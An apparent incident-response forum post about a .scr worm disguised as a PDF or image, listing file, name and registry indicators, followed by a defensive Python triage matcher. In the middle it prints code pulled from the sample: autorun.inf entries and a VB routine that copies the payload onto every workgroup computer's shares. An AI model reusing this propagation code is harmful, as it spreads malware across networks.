Here's what we've pulled out so far. Your mileage may vary.
The malicious file linked in the e-mail is shown as a pdf but it's actually a .scr. I don't have the site here but we blocked it first thing.
Files:
Look for n73.image12.03.2009.JPG.scr and kill it. Registry entries show “pdf*.scr” so anything matching that pattern is suspect.
In c:\windows:
Csrss.exe <- that’s a big part of this
ff.exe
gc.exe
hst.iq
ie.exe
im.exe
op.exe
pspv.exe
rd.exe
re.exe
re.iq
tryme1.exe
Registry:
Hklm\software\microsoft\windows nt\currentversion\image file execution options\<any key ending in ExE> <- pay attention to the case
Hklm\software\microsoft\search assistant\ACMru\5603 and possibly 5604
Here's some code we pulled out of the .scr:
[autorun]
open=open.exe
icon=%windir%\system32\shell32.dll,8
action=Open Drive to view files
shell\open=Open
shell\open\command=open.exe
shell\open\default=1
' List Network Shares
Const HKEY_LOCAL_MACHINE = &H80000002
dim i
i="0"
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colShares = objWMIService.ExecQuery("Select * from Win32_Share")
For each objShare in colShares
strComputer = "."
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & _
strComputer & "\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
strValueName = i
strValue = objShare.Path
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
i = i + 1
Next
on error resume next
Dim domain
Dim computer
Set domain = GetObject("WinNT://Workgroup")
domain.Filter = Array("Computer")
For Each computer In domain
strComp = computer.Name
DoEvents
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\d\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\c\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\New Folder\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\music\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\print\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\E\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\F\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\G\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\H\" & "N73.Image12.03.2009.JPG.scr"
Next
Text4
[autorun]
open=open.exe
icon=%SystemRoot%\system32\SHELL32.dll,4
action=Open folder to view files
shell\open=Open
shell\open\command=open.exe
shell\open\default=1
/back to work, don't ask me for help I'm a little busy lol
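
Added example, not part of the original post: a small triage matcher that checks an exported file and registry-key inventory against the indicators listed above (the c:\windows file names, the dropper name, "pdf*.scr", case-sensitive IFEO keys ending in ExE, and the ACMru entries). It generalizes the .JPG.scr name to any document or image extension in front of .scr. The function names, the inventory format and the sample entries are assumptions constructed for illustration.

```python
import fnmatch
import ntpath
import re

# Indicators copied from the post; c:\windows as the Windows directory is assumed.
WINDOWS_DROPS = {"csrss.exe", "ff.exe", "gc.exe", "hst.iq", "ie.exe", "im.exe",
                 "op.exe", "pspv.exe", "rd.exe", "re.exe", "re.iq", "tryme1.exe"}
IFEO = r"software\microsoft\windows nt\currentversion\image file execution options"
ACMRU = r"software\microsoft\search assistant\acmru"
# Generalization: any document/image extension directly in front of .scr.
DOUBLE_EXT = re.compile(r"\.(jpe?g|png|gif|bmp|pdf|docx?|xlsx?|txt)\.scr$", re.I)

def check_file(path):
    """Return why a file path matches the post's indicators, or None."""
    folder, name = ntpath.split(path)
    low = name.lower()
    if low == "n73.image12.03.2009.jpg.scr":
        return "dropper name"
    if DOUBLE_EXT.search(name) or fnmatch.fnmatchcase(low, "pdf*.scr"):
        return "disguised .scr"
    # The genuine csrss.exe lives in System32, so only c:\windows itself counts.
    if ntpath.normcase(folder).rstrip("\\") == r"c:\windows" and low in WINDOWS_DROPS:
        return "listed file in c:\\windows"
    return None

def check_key(key):
    """Return why a registry key path matches the post's indicators, or None."""
    hive, _, rest = key.partition("\\")
    parent, _, leaf = rest.rpartition("\\")
    if hive.upper() not in ("HKLM", "HKEY_LOCAL_MACHINE"):
        return None
    if parent.lower() == IFEO and leaf.endswith("ExE"):  # case-sensitive on purpose
        return "IFEO key ending in ExE"
    if parent.lower() == ACMRU and leaf in ("5603", "5604"):
        return "ACMru entry"
    return None

def triage(files, keys):
    """Return (item, reason) for every inventory entry that matches."""
    hits = [(f, check_file(f)) for f in files] + [(k, check_key(k)) for k in keys]
    return [(item, why) for item, why in hits if why]

# Constructed inventory for illustration, not taken from a real host.
SAMPLE_FILES = [r"C:\Windows\csrss.exe", r"C:\Windows\System32\csrss.exe",
                r"D:\music\N73.Image12.03.2009.JPG.scr", r"C:\Users\Public\pdf_scan.scr",
                r"C:\Windows\System32\ssText3d.scr"]
SAMPLE_KEYS = ["HKLM\\" + IFEO + r"\example.ExE", "HKLM\\" + IFEO + r"\example.exe",
               r"HKLM\SOFTWARE\Microsoft\Search Assistant\ACMru\5603"]

if __name__ == "__main__":
    for item, why in triage(SAMPLE_FILES, SAMPLE_KEYS):
        print(f"{why:28} {item}")
```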